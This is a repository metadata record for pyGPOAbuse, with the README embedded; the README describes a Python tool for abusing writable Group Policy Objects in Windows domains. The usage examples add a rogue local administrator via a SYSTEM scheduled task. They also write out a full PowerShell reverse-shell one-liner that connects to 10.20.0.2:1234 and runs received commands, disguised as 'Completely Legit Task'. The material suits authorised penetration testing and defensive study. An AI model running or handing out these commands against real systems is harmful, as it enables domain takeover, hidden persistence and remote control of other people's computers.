{"id":18864767,"url":"https://github.com/hackndo/pygpoabuse","last_synced_at":"2025-04-05T09:07:58.450Z","repository":{"id":39865882,"uuid":"262877735","full_name":"Hackndo/pyGPOAbuse","owner":"Hackndo","description":"Partial python implementation of SharpGPOAbuse","archived":false,"fork":false,"pushed_at":"2024-02-18T19:23:57.000Z","size":389,"stargazers_count":406,"open_issues_count":6,"forks_count":47,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-03-29T08:07:03.773Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackndo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-10T21:21:27.000Z","updated_at":"2025-03-26T16:29:37.000Z","dependencies_parsed_at":"2024-02-18T20:30:30.189Z","dependency_job_id":"aa400b22-99b0-4eea-8f97-25b510faa222","html_url":"https://github.com/Hackndo/pyGPOAbuse","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackndo","download_url":"https://codeload.github.com/Hackndo/pyGPOAbuse/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247312081,"owners_count":20918344,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T04:43:58.722Z","updated_at":"2025-04-05T09:07:58.396Z","avatar_url":"https://github.com/Hackndo.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# pyGPOAbuse\r\n\r\n## Description\r\n\r\nPython **partial** implementation of [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) by[@pkb1s](https://twitter.com/pkb1s)\r\n\r\nThis tool can be used when a controlled account can modify an existing GPO that applies to one or more users \u0026 computers. It will create an **immediate scheduled task** as **SYSTEM** on the remote computer for computer GPO, or as logged in user for user GPO.\r\n\r\nDefault behavior adds a local administrator.\r\n\r\n![Example](https://github.com/Hackndo/pygpoabuse/raw/master/assets/demo.gif)\r\n\r\n## How to use\r\n\r\n### Basic usage\r\n\r\nAdd **john** user to local administrators group (Password: **H4x00r123..**)\r\n\r\n```bash\r\n./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\"\r\n``` \r\n\r\n### Advanced usage\r\n\r\nReverse shell example\r\n\r\n```bash\r\n./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\ \r\n    -powershell \\ \r\n    -command \"\\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\\$stream = \\$client.GetStream();[byte[]]\\$bytes = 0..65535|%{0};while((\\$i = \\$stream.Read(\\$bytes, 0, \\$bytes.Length)) -ne 0){;\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\$bytes,0, \\$i);\\$sendback = (iex \\$data 2\u003e\u00261 | Out-String );\\$sendback2 = \\$sendback + 'PS ' + (pwd).Path + '\u003e ';\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\$sendback2);\\$stream.Write(\\$sendbyte,0,\\$sendbyte.Length);\\$stream.Flush()};\\$client.Close()\" \\ \r\n    -taskname \"Completely Legit Task\" \\\r\n    -description \"Dis is legit, pliz no delete\" \\ \r\n    -user\r\n``` \r\n\r\n\r\n## Credits\r\n\r\n* [@pkb1s](https://twitter.com/pkb1s) for [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse)\r\n* [@airman604](https://twitter.com/airman604) for [schtask_now.py](https://github.com/airman604/schtask_now)\r\n* [@SkelSec](https://twitter.com/skelsec) for [msldap](https://github.com/skelsec/msldap)\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fpygpoabuse","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackndo%2Fpygpoabuse","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fpygpoabuse/lists"}